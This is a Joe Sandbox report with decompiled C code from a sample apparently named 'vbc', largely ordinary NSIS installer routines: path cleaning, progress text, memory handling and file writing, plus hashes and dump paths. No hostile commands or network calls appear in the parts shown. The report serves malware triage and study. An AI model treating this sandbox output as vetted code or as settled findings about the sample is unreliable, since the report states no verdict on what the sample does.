                                                • API String ID: 163830602-2366072709
                                                • Opcode ID: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
                                                • Instruction ID: 36eba916602f65c1f8b814f2f26102ddc75cc08ed25eda7b441ea0696c55e726
                                                • Opcode Fuzzy Hash: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
                                                • Instruction Fuzzy Hash: C551E975D00219AADF20EF95CA89AAEBB79FF04304F10817BE541B62D4D7B49D82CB58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 91%
                                                			E004067C4(WCHAR* _a4) {
                                                				short _t5;
                                                				short _t7;
                                                				WCHAR* _t19;
                                                				WCHAR* _t20;
                                                				WCHAR* _t21;
                                                
                                                				_t20 = _a4;
                                                				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
                                                					_t20 =  &(_t20[4]);
                                                				}
                                                				if( *_t20 != 0 && E00405E83(_t20) != 0) {
                                                					_t20 =  &(_t20[2]);
                                                				}
                                                				_t5 =  *_t20;
                                                				_t21 = _t20;
                                                				_t19 = _t20;
                                                				if(_t5 != 0) {
                                                					do {
                                                						if(_t5 > 0x1f &&  *((short*)(E00405E39(L"*?|<>/\":", _t5))) == 0) {
                                                							E00405FE8(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
                                                							_t19 = CharNextW(_t19);
                                                						}
                                                						_t20 = CharNextW(_t20);
                                                						_t5 =  *_t20;
                                                					} while (_t5 != 0);
                                                				}
                                                				 *_t19 =  *_t19 & 0x00000000;
                                                				while(1) {
                                                					_push(_t19);
                                                					_push(_t21);
                                                					_t19 = CharPrevW();
                                                					_t7 =  *_t19;
                                                					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                						break;
                                                					}
                                                					 *_t19 =  *_t19 & 0x00000000;
                                                					if(_t21 < _t19) {
                                                						continue;
                                                					}
                                                					break;
                                                				}
                                                				return _t7;
                                                			}








                                                0x004067c6
                                                0x004067cf
                                                0x004067e6
                                                0x004067e6
                                                0x004067ed
                                                0x004067f9
                                                0x004067f9
                                                0x004067fc
                                                0x004067ff
                                                0x00406804
                                                0x00406806
                                                0x0040680f
                                                0x00406813
                                                0x00406830
                                                0x00406838
                                                0x00406838
                                                0x0040683d
                                                0x0040683f
                                                0x00406842
                                                0x00406847
                                                0x00406848
                                                0x0040684c
                                                0x0040684c
                                                0x0040684d
                                                0x00406854
                                                0x00406856
                                                0x0040685d
                                                0x00000000
                                                0x00000000
                                                0x00406865
                                                0x0040686b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040686b
                                                0x00406870

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.687854101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.687851142.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687859110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687862814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687875950.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687891941.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687919476.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687924807.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: Char$Next$Prev
                                                • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 589700163-3083651966
                                                • Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                • Instruction ID: 8e05d213a2b26a47bd0c986db1e6a85e10b5e067f284fb5e9645f7af11a9ce3c
                                                • Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                • Instruction Fuzzy Hash: 7311862780161295DB313B158C44A77A2A8AF58798F56843FED86B32C1E77C8C9282AD
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00404E54(struct HWND__* _a4, intOrPtr _a8) {
                                                				long _v8;
                                                				signed char _v12;
                                                				unsigned int _v16;
                                                				void* _v20;
                                                				intOrPtr _v24;
                                                				long _v56;
                                                				void* _v60;
                                                				long _t15;
                                                				unsigned int _t19;
                                                				signed int _t25;
                                                				struct HWND__* _t28;
                                                
                                                				_t28 = _a4;
                                                				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
                                                				if(_a8 == 0) {
                                                					L4:
                                                					_v56 = _t15;
                                                					_v60 = 4;
                                                					SendMessageW(_t28, 0x113e, 0,  &_v60);
                                                					return _v24;
                                                				}
                                                				_t19 = GetMessagePos();
                                                				_v16 = _t19 >> 0x10;
                                                				_v20 = _t19;
                                                				ScreenToClient(_t28,  &_v20);
                                                				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
                                                				if((_v12 & 0x00000066) != 0) {
                                                					_t15 = _v8;
                                                					goto L4;
                                                				}
                                                				return _t25 | 0xffffffff;
                                                			}














                                                0x00404e62
                                                0x00404e6f
                                                0x00404e75
                                                0x00404eb3
                                                0x00404eb3
                                                0x00404ec2
                                                0x00404ec9
                                                0x00000000
                                                0x00404ecb
                                                0x00404e77
                                                0x00404e86
                                                0x00404e8e
                                                0x00404e91
                                                0x00404ea3
                                                0x00404ea9
                                                0x00404eb0
                                                0x00000000
                                                0x00404eb0
                                                0x00000000

                                                APIs
                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E6F
                                                • GetMessagePos.USER32 ref: 00404E77
                                                • ScreenToClient.USER32(?,?), ref: 00404E91
                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EA3
                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EC9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.687854101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.687851142.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687859110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687862814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687875950.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687891941.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687919476.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687924807.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: Message$Send$ClientScreen
                                                • String ID: f
                                                • API String ID: 41195575-1993550816
                                                • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                • Instruction ID: 177f1d0b32132a6560496663958852c5fe6f1b23f9da62007dee57caca3d7f28
                                                • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                • Instruction Fuzzy Hash: 34014C71900219BADB00DBA4DD85BFFBBB8AB54711F10012BBA50B61C0D7B49A058BA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
                                                				short _v132;
                                                				int _t11;
                                                				int _t20;
                                                
                                                				if(_a8 == 0x110) {
                                                					SetTimer(_a4, 1, 0xfa, 0);
                                                					_a8 = 0x113;
                                                				}
                                                				if(_a8 == 0x113) {
                                                					_t20 =  *0x41ea18; // 0x160cd
                                                					_t11 =  *0x42aa24;
                                                					if(_t20 >= _t11) {
                                                						_t20 = _t11;
                                                					}
                                                					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
                                                					SetWindowTextW(_a4,  &_v132);
                                                					SetDlgItemTextW(_a4, 0x406,  &_v132);
                                                				}
                                                				return 0;
                                                			}






                                                0x00402fa3
                                                0x00402fb1
                                                0x00402fb7
                                                0x00402fb7
                                                0x00402fc5
                                                0x00402fc7
                                                0x00402fcd
                                                0x00402fd4
                                                0x00402fd6
                                                0x00402fd6
                                                0x00402fec
                                                0x00402ffc
                                                0x0040300e
                                                0x0040300e
                                                0x00403016

                                                APIs
                                                Strings
                                                • verifying installer: %d%%, xrefs: 00402FE6
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.687854101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.687851142.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687859110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687862814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687875950.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687891941.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687919476.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687924807.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: Text$ItemTimerWindowwsprintf
                                                • String ID: verifying installer: %d%%
                                                • API String ID: 1451636040-82062127
                                                • Opcode ID: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
                                                • Instruction ID: eb17ebabde20c32bd565f0ca98bf5c3c7f8a04474e671541d9d17dad0456e96b
                                                • Opcode Fuzzy Hash: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
                                                • Instruction Fuzzy Hash: 20014B7064020DABEF209F60DE4AFEA3B79FB04345F008039FA06B51D0DBB999559F69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 75%
                                                			E73282655() {
                                                				intOrPtr _t24;
                                                				void* _t26;
                                                				intOrPtr _t27;
                                                				signed int _t39;
                                                				void* _t40;
                                                				void* _t43;
                                                				intOrPtr _t44;
                                                				void* _t45;
                                                
                                                				_t40 = E732812BB();
                                                				_t24 =  *((intOrPtr*)(_t45 + 0x18));
                                                				_t44 =  *((intOrPtr*)(_t24 + 0x1014));
                                                				_t43 = (_t44 + 0x81 << 5) + _t24;
                                                				do {
                                                					if( *((intOrPtr*)(_t43 - 4)) >= 0) {
                                                					}
                                                					_t39 =  *(_t43 - 8) & 0x000000ff;
                                                					if(_t39 <= 7) {
                                                						switch( *((intOrPtr*)(_t39 * 4 +  &M73282784))) {
                                                							case 0:
                                                								 *_t40 = 0;
                                                								goto L17;
                                                							case 1:
                                                								__eax =  *__eax;
                                                								if(__ecx > __ebx) {
                                                									 *(__esp + 0x10) = __ecx;
                                                									__ecx =  *(0x7328407c + __edx * 4);
                                                									__edx =  *(__esp + 0x10);
                                                									__ecx = __ecx * __edx;
                                                									asm("sbb edx, edx");
                                                									__edx = __edx & __ecx;
                                                									__eax = __eax &  *(0x7328409c + __edx * 4);
                                                								}
                                                								_push(__eax);
                                                								goto L15;
                                                							case 2:
                                                								__eax = E73281510(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
                                                								goto L16;
                                                							case 3:
                                                								__ecx =  *0x7328506c;
                                                								__edx = __ecx - 1;
                                                								__eax = MultiByteToWideChar(__ebx, __ebx,  *__eax, __ecx, __edi, __edx);
                                                								__eax =  *0x7328506c;
                                                								 *((short*)(__edi + __eax * 2 - 2)) = __bx;
                                                								goto L17;
                                                							case 4:
                                                								__eax = lstrcpynW(__edi,  *__eax,  *0x7328506c);
                                                								goto L17;
                                                							case 5:
                                                								_push( *0x7328506c);
                                                								_push(__edi);
                                                								_push( *__eax);
                                                								__imp__StringFromGUID2();
                                                								goto L17;
                                                							case 6:
                                                								_push( *__esi);
                                                								L15:
                                                								__eax = wsprintfW(__edi, 0x73285000);
                                                								L16:
                                                								__esp = __esp + 0xc;
                                                								goto L17;
                                                						}
                                                					}
                                                					L17:
                                                					_t26 =  *(_t43 + 0x14);
                                                					if(_t26 != 0 && ( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x18)))) != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
                                                						GlobalFree(_t26);
                                                					}
                                                					_t27 =  *((intOrPtr*)(_t43 + 0xc));
                                                					if(_t27 != 0) {
                                                						if(_t27 != 0xffffffff) {
                                                							if(_t27 > 0) {
                                                								E73281381(_t27 - 1, _t40);
                                                								goto L26;
                                                							}
                                                						} else {
                                                							E73281312(_t40);
                                                							L26:
                                                						}
                                                					}
                                                					_t44 = _t44 - 1;
                                                					_t43 = _t43 - 0x20;
                                                				} while (_t44 >= 0);
                                                				return GlobalFree(_t40);
                                                			}











                                                0x7328265f
                                                0x73282661
                                                0x73282665
                                                0x73282674
                                                0x73282678
                                                0x7328267d
                                                0x7328267d
                                                0x73282685
                                                0x7328268c
                                                0x73282692
                                                0x00000000
                                                0x73282699
                                                0x00000000
                                                0x00000000
                                                0x732826a1
                                                0x732826a5
                                                0x732826a8
                                                0x732826ac
                                                0x732826b3
                                                0x732826b7
                                                0x732826bd
                                                0x732826bf
                                                0x732826c1
                                                0x732826c1
                                                0x732826c8
                                                0x00000000
                                                0x00000000
                                                0x732826d1
                                                0x00000000
                                                0x00000000
                                                0x732826d8
                                                0x732826de
                                                0x732826e8
                                                0x732826ee
                                                0x732826f3
                                                0x00000000
                                                0x00000000
                                                0x73282714
                                                0x00000000
                                                0x00000000
                                                0x732826fa
                                                0x73282700
                                                0x73282701
                                                0x73282703
                                                0x00000000
                                                0x00000000
                                                0x7328271c
                                                0x7328271e
                                                0x73282724
                                                0x7328272a
                                                0x7328272a
                                                0x00000000
                                                0x00000000
                                                0x73282692
                                                0x7328272d
                                                0x7328272d
                                                0x73282732
                                                0x73282743
                                                0x73282743
                                                0x73282749
                                                0x7328274e
                                                0x73282753
                                                0x7328275f
                                                0x73282764
                                                0x00000000
                                                0x73282769
                                                0x73282755
                                                0x73282756
                                                0x7328276a
                                                0x7328276a
                                                0x73282753
                                                0x7328276b
                                                0x7328276c
                                                0x7328276f
                                                0x73282783

                                                APIs
                                                  • Part of subcall function 732812BB: GlobalAlloc.KERNELBASE(00000040,?,732812DB,?,7328137F,00000019,732811CA,-000000A0), ref: 732812C5
                                                • GlobalFree.KERNEL32(?), ref: 73282743
                                                • GlobalFree.KERNEL32(00000000), ref: 73282778
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.688751399.0000000073281000.00000020.00000001.01000000.00000004.sdmp, Offset: 73280000, based on PE: true
                                                • Associated: 00000003.00000002.688743070.0000000073280000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000003.00000002.688756158.0000000073284000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000003.00000002.688761184.0000000073286000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_73280000_vbc.jbxd
                                                Similarity
                                                • API ID: Global$Free$Alloc
                                                • String ID:
                                                • API String ID: 1780285237-0
                                                • Opcode ID: df26d03a97e817f5113a3dc9f93109ac0b1fdb737bd8ec5bcfcf29d77c001928
                                                • Instruction ID: b34f27f60080445c526e11579c6f1be6ab316017ca26752e04c272a69485bd57
                                                • Opcode Fuzzy Hash: df26d03a97e817f5113a3dc9f93109ac0b1fdb737bd8ec5bcfcf29d77c001928
                                                • Instruction Fuzzy Hash: FA31047260431ADFD71A9F52CD88FEA7BBAFB853043248129F106972D0C7746884EB62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 86%
                                                			E00402950(int __ebx, void* __eflags) {
                                                				WCHAR* _t26;
                                                				void* _t29;
                                                				long _t37;
                                                				int _t49;
                                                				void* _t52;
                                                				void* _t54;
                                                				void* _t56;
                                                				void* _t59;
                                                				void* _t60;
                                                				void* _t61;
                                                
                                                				_t49 = __ebx;
                                                				_t52 = 0xfffffd66;
                                                				_t26 = E00402DA6(0xfffffff0);
                                                				_t55 = _t26;
                                                				 *(_t61 - 0x40) = _t26;
                                                				if(E00405E83(_t26) == 0) {
                                                					E00402DA6(0xffffffed);
                                                				}
                                                				E00406008(_t55);
                                                				_t29 = E0040602D(_t55, 0x40000000, 2);
                                                				 *(_t61 + 8) = _t29;
                                                				if(_t29 != 0xffffffff) {
                                                					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
                                                					if( *(_t61 - 0x28) != _t49) {
                                                						_t37 =  *0x434f14;
                                                						 *(_t61 - 0x44) = _t37;
                                                						_t54 = GlobalAlloc(0x40, _t37);
                                                						if(_t54 != _t49) {
                                                							E004034E5(_t49);
                                                							E004034CF(_t54,  *(_t61 - 0x44));
                                                							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
                                                							 *(_t61 - 0x10) = _t59;
                                                							if(_t59 != _t49) {
                                                								E004032B4( *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
                                                								while( *_t59 != _t49) {
                                                									_t60 = _t59 + 8;
                                                									 *(_t61 - 0x3c) =  *_t59;
                                                									E00405FE8( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
                                                									_t59 = _t60 +  *(_t61 - 0x3c);
                                                								}
                                                								GlobalFree( *(_t61 - 0x10));
                                                							}
                                                							E004060DF( *(_t61 + 8), _t54,  *(_t61 - 0x44));
                                                							GlobalFree(_t54);
                                                							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
                                                						}
                                                					}
                                                					_t52 = E004032B4( *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
                                                					CloseHandle( *(_t61 + 8));
                                                				}
                                                				_t56 = 0xfffffff3;
                                                				if(_t52 < _t49) {
                                                					_t56 = 0xffffffef;
                                                					DeleteFileW( *(_t61 - 0x40));
                                                					 *((intOrPtr*)(_t61 - 4)) = 1;
                                                				}
                                                				_push(_t56);
                                                				E00401423();
                                                				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t61 - 4));
                                                				return 0;
                                                			}













                                                0x00402950
                                                0x00402952
                                                0x00402957
                                                0x0040295c
                                                0x0040295f
                                                0x00402969
                                                0x0040296d
                                                0x0040296d
                                                0x00402973
                                                0x00402980
                                                0x00402988
                                                0x0040298b
                                                0x00402997
                                                0x0040299a
                                                0x004029a0
                                                0x004029ae
                                                0x004029b3
                                                0x004029b7
                                                0x004029ba
                                                0x004029c3
                                                0x004029cf
                                                0x004029d3
                                                0x004029d6
                                                0x004029e0
                                                0x004029ff
                                                0x004029ec
                                                0x004029f4
                                                0x004029f7
                                                0x004029fc
                                                0x004029fc
                                                0x00402a06
                                                0x00402a06
                                                0x00402a13
                                                0x00402a19
                                                0x00402a1f
                                                0x00402a1f
                                                0x004029b7
                                                0x00402a33
                                                0x00402a35
                                                0x00402a35
                                                0x00402a3f
                                                0x00402a40
                                                0x00402a44
                                                0x00402a48
                                                0x00402a4e
                                                0x00402a4e
                                                0x00402a55
                                                0x004022f1
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                • GlobalFree.KERNEL32(?), ref: 00402A06
                                                • GlobalFree.KERNEL32(00000000), ref: 00402A19
                                                • CloseHandle.KERNEL32(?), ref: 00402A35
                                                • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.687854101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.687851142.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687859110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687862814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687875950.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687891941.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687919476.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687924807.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                • String ID:
                                                • API String ID: 2667972263-0
                                                • Opcode ID: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
                                                • Instruction ID: 8fc1a79e9ee36ebd610a2d663d7387b5f1fea8f48d7bc9e01940cd119f3fb53c
                                                • Opcode Fuzzy Hash: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
                                                • Instruction Fuzzy Hash: 5831C271D00124BBCF216FA9CE49DDEBE79AF49364F14023AF450762E0CB794C429BA8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 97%
                                                			E73281979(signed int __edx, void* __eflags, void* _a8, void* _a16) {
                                                				void* _v8;
                                                				signed int _v12;
                                                				signed int _v20;
                                                				signed int _v24;
                                                				char _v76;
                                                				void _t45;
                                                				signed int _t46;
                                                				signed int _t47;
                                                				signed int _t48;
                                                				signed int _t57;
                                                				signed int _t58;
                                                				signed int _t59;
                                                				signed int _t60;
                                                				signed int _t61;
                                                				void* _t67;
                                                				void* _t68;
                                                				void* _t69;
                                                				void* _t70;
                                                				void* _t71;
                                                				signed int _t77;
                                                				void* _t81;
                                                				signed int _t83;
                                                				signed int _t85;
                                                				signed int _t87;
                                                				signed int _t90;
                                                				void* _t101;
                                                
                                                				_t85 = __edx;
                                                				 *0x7328506c = _a8;
                                                				_t77 = 0;
                                                				 *0x73285070 = _a16;
                                                				_v12 = 0;
                                                				_v8 = E732812E3();
                                                				_t90 = E732813B1(_t42);
                                                				_t87 = _t85;
                                                				_t81 = E732812E3();
                                                				_a8 = _t81;
                                                				_t45 =  *_t81;
                                                				if(_t45 != 0x7e && _t45 != 0x21) {
                                                					_a16 = E732812E3();
                                                					_t77 = E732813B1(_t74);
                                                					_v12 = _t85;
                                                					GlobalFree(_a16);
                                                					_t81 = _a8;
                                                				}
                                                				_t46 =  *_t81 & 0x0000ffff;
                                                				_t101 = _t46 - 0x2f;
                                                				if(_t101 > 0) {
                                                					_t47 = _t46 - 0x3c;
                                                					__eflags = _t47;
                                                					if(_t47 == 0) {
                                                						__eflags =  *((short*)(_t81 + 2)) - 0x3c;
                                                						if( *((short*)(_t81 + 2)) != 0x3c) {
                                                							__eflags = _t87 - _v12;
                                                							if(__eflags > 0) {
                                                								L56:
                                                								_t48 = 0;
                                                								__eflags = 0;
                                                								L57:
                                                								asm("cdq");
                                                								L58:
                                                								_t90 = _t48;
                                                								_t87 = _t85;
                                                								L59:
                                                								E73281510(_t85, _t90, _t87,  &_v76);
                                                								E73281312( &_v76);
                                                								GlobalFree(_v8);
                                                								return GlobalFree(_a8);
                                                							}
                                                							if(__eflags < 0) {
                                                								L49:
                                                								__eflags = 0;
                                                								L50:
                                                								_t48 = 1;
                                                								goto L57;
                                                							}
                                                							__eflags = _t90 - _t77;
                                                							if(_t90 < _t77) {
                                                								goto L49;
                                                							}
                                                							goto L56;
                                                						}
                                                						_t85 = _t87;
                                                						_t48 = E73283050(_t90, _t77, _t85);
                                                						goto L58;
                                                					}
                                                					_t57 = _t47 - 1;
                                                					__eflags = _t57;
                                                					if(_t57 == 0) {
                                                						__eflags = _t90 - _t77;
                                                						if(_t90 != _t77) {
                                                							goto L56;
                                                						}
                                                						__eflags = _t87 - _v12;
                                                						if(_t87 != _v12) {
                                                							goto L56;
                                                						}
                                                						goto L49;
                                                					}
                                                					_t58 = _t57 - 1;
                                                					__eflags = _t58;
                                                					if(_t58 == 0) {
                                                						__eflags =  *((short*)(_t81 + 2)) - 0x3e;
                                                						if( *((short*)(_t81 + 2)) != 0x3e) {
                                                							__eflags = _t87 - _v12;
                                                							if(__eflags < 0) {
                                                								goto L56;
                                                							}
                                                							if(__eflags > 0) {
                                                								goto L49;
                                                							}
                                                							__eflags = _t90 - _t77;
                                                							if(_t90 <= _t77) {
                                                								goto L56;
                                                							}
                                                							goto L49;
                                                						}
                                                						__eflags =  *((short*)(_t81 + 4)) - 0x3e;
                                                						_t85 = _t87;
                                                						_t59 = _t90;
                                                						_t83 = _t77;
                                                						if( *((short*)(_t81 + 4)) != 0x3e) {
                                                							_t48 = E73283070(_t59, _t83, _t85);
                                                						} else {
                                                							_t48 = E732830A0(_t59, _t83, _t85);
                                                						}
                                                						goto L58;
                                                					}
                                                					_t60 = _t58 - 0x20;
                                                					__eflags = _t60;
                                                					if(_t60 == 0) {
                                                						_t90 = _t90 ^ _t77;
                                                						_t87 = _t87 ^ _v12;
                                                						goto L59;
                                                					}
                                                					_t61 = _t60 - 0x1e;
                                                					__eflags = _t61;
                                                					if(_t61 == 0) {
                                                						__eflags =  *((short*)(_t81 + 2)) - 0x7c;
                                                						if( *((short*)(_t81 + 2)) != 0x7c) {
                                                							_t90 = _t90 | _t77;
                                                							_t87 = _t87 | _v12;
                                                							goto L59;
                                                						}
                                                						__eflags = _t90 | _t87;
                                                						if((_t90 | _t87) != 0) {
                                                							goto L49;
                                                						}
                                                						__eflags = _t77 | _v12;
                                                						if((_t77 | _v12) != 0) {
                                                							goto L49;
                                                						}
                                                						goto L56;
                                                					}
                                                					__eflags = _t61 == 0;
                                                					if(_t61 == 0) {
                                                						_t90 =  !_t90;
                                                						_t87 =  !_t87;
                                                					}
                                                					goto L59;
                                                				}
                                                				if(_t101 == 0) {
                                                					L21:
                                                					__eflags = _t77 | _v12;
                                                					if((_t77 | _v12) != 0) {
                                                						_v24 = E73282EE0(_t90, _t87, _t77, _v12);
                                                						_v20 = _t85;
                                                						_t48 = E73282F90(_t90, _t87, _t77, _v12);
                                                						_t81 = _a8;
                                                					} else {
                                                						_v24 = _v24 & 0x00000000;
                                                						_v20 = _v20 & 0x00000000;
                                                						_t48 = _t90;
                                                						_t85 = _t87;
                                                					}
                                                					__eflags =  *_t81 - 0x2f;
                                                					if( *_t81 != 0x2f) {
                                                						goto L58;
                                                					} else {
                                                						_t90 = _v24;
                                                						_t87 = _v20;
                                                						goto L59;
                                                					}
                                                				}
                                                				_t67 = _t46 - 0x21;
                                                				if(_t67 == 0) {
                                                					_t48 = 0;
                                                					__eflags = _t90 | _t87;
                                                					if((_t90 | _t87) != 0) {
                                                						goto L57;
                                                					}
                                                					goto L50;
                                                				}
                                                				_t68 = _t67 - 4;
                                                				if(_t68 == 0) {
                                                					goto L21;
                                                				}
                                                				_t69 = _t68 - 1;
                                                				if(_t69 == 0) {
                                                					__eflags =  *((short*)(_t81 + 2)) - 0x26;
                                                					if( *((short*)(_t81 + 2)) != 0x26) {
                                                						_t90 = _t90 & _t77;
                                                						_t87 = _t87 & _v12;
                                                						goto L59;
                                                					}
                                                					__eflags = _t90 | _t87;
                                                					if((_t90 | _t87) == 0) {
                                                						goto L56;
                                                					}
                                                					__eflags = _t77 | _v12;
                                                					if((_t77 | _v12) == 0) {
                                                						goto L56;
                                                					}
                                                					goto L49;
                                                				}
                                                				_t70 = _t69 - 4;
                                                				if(_t70 == 0) {
                                                					_t48 = E73282EA0(_t90, _t87, _t77, _v12);
                                                					goto L58;
                                                				} else {
                                                					_t71 = _t70 - 1;
                                                					if(_t71 == 0) {
                                                						_t90 = _t90 + _t77;
                                                						asm("adc edi, [ebp-0x8]");
                                                					} else {
                                                						if(_t71 == 0) {
                                                							_t90 = _t90 - _t77;
                                                							asm("sbb edi, [ebp-0x8]");
                                                						}
                                                					}
                                                					goto L59;
                                                				}
                                                			}





























                                                0x73281979
                                                0x73281983
                                                0x7328198c
                                                0x7328198f
                                                0x73281994
                                                0x7328199d
                                                0x732819a6
                                                0x732819a8
                                                0x732819af
                                                0x732819b1
                                                0x732819b4
                                                0x732819bb
                                                0x732819c9
                                                0x732819d2
                                                0x732819d7
                                                0x732819da
                                                0x732819e0
                                                0x732819e0
                                                0x732819e3
                                                0x732819e6
                                                0x732819e9
                                                0x73281ab1
                                                0x73281ab1
                                                0x73281ab4
                                                0x73281b34
                                                0x73281b39
                                                0x73281b48
                                                0x73281b4b
                                                0x73281b53
                                                0x73281b53
                                                0x73281b53
                                                0x73281b55
                                                0x73281b55
                                                0x73281b56
                                                0x73281b56
                                                0x73281b58
                                                0x73281b5a
                                                0x73281b60
                                                0x73281b69
                                                0x73281b7a
                                                0x73281b85
                                                0x73281b85
                                                0x73281b4d
                                                0x73281b2f
                                                0x73281b2f
                                                0x73281b31
